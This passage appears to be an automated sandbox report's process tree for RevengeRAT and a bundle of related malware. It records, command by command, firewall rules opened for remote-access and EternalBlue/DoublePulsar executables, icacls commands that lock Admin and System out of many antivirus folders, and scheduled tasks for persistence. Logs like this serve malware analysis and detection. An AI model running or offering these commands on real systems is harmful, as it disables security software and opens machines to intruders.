    netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:1944
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
  2⤵
  PID:2596
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:2016
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
  2⤵
  PID:1236
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:2396
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
  2⤵
  PID:1588
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:2736
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
  2⤵
  PID:108
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:2480
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
  2⤵
  PID:2820
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:1952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
  2⤵
  PID:1984
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:1664
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
  2⤵
  PID:1920
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
    3⤵
    - Modifies Windows Firewall
    PID:2112
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
  2⤵
  PID:3000
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
    3⤵
    - Modifies Windows Firewall
    PID:1728
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:284
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1548
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
  2⤵
  PID:2124
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2408
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1872
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2692
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
  2⤵
  PID:1720
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2012
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1804
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2848
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
  2⤵
  PID:2248
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2192
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3012
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1876
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
  2⤵
  PID:1532
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:936
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:996
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1884
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
  2⤵
  PID:944
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2168
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2520
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2224
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
  2⤵
  PID:2152
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1640
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2712
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2096
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
  2⤵
  PID:648
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1964
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2264
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1740
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
  2⤵
  PID:676
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2932
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
  2⤵
  PID:2488
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\programdata\Malwarebytes /deny Admin:(F)
    3⤵
    - Modifies file permissions
    PID:2604
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
  2⤵
  PID:2792
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\programdata\Malwarebytes /deny System:(F)
    3⤵
    - Modifies file permissions
    PID:2108
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
  2⤵
  PID:980
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\MB3Install /deny Admin:(F)
    3⤵
    - Modifies file permissions
    PID:1236
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
  2⤵
  PID:1784
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\MB3Install /deny System:(F)
    3⤵
    - Modifies file permissions
    PID:2816
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3008
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1368
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
  2⤵
  PID:2204
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1868
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1756
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2648
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
  2⤵
  PID:2516
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2804
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2864
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2916
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2664
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2812
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2208
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
  2⤵
  PID:2920
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2532
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3048
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2088
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2880
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2672
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2964
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1536
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3012
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2896
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2484
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1592
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:984
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1740
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2468
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2040
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1944
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2712
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:788
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1480
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2340
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2488
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2404
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2872
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2544
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2588
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2560
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2668
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:1688
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1656
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2524
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1204
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
  2⤵
  PID:1388
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1032
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2536
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2408
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:2968
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1808
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:816
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1876
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:3068
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2116
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2940
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1740
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:984
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1004
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1276
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1660
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1996
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2908
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1692
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1960
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1300
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:804
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1684
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1880
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:108
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1856
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2484
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
  2⤵
  PID:1736
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:324
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2936
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
  2⤵
  PID:2016
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2792
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1952
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1728
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1196
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2940

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
PID:1036
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe
  2⤵
  PID:1184
- - C:\ProgramData\Windows\rfusclient.exe
    C:\ProgramData\Windows\rfusclient.exe /tray
    3⤵
    PID:1504
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe /tray
  2⤵
  PID:3052

C:\Users\Admin\Desktop\RevengeRAT.exe
"C:\Users\Admin\Desktop\RevengeRAT.exe"
1⤵
PID:1536
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
  2⤵
  PID:2520
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
    3⤵
    PID:2416
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\aknxknid.cmdline"
    3⤵
    PID:2400
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES17C6.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc17C5.tmp"
      4⤵
      PID:3064
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\6kfaioce.cmdline"
    3⤵
    PID:2152
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES194C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc194B.tmp"
      4⤵
      PID:1680
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\lapr7ffg.cmdline"
    3⤵
    PID:1828
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1A94.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc1A93.tmp"
      4⤵
      PID:1388
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\yafm0ejd.cmdline"
    3⤵
    PID:2884
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1C2A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc1C29.tmp"
      4⤵
      PID:2756
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ahur7w-h.cmdline"
    3⤵
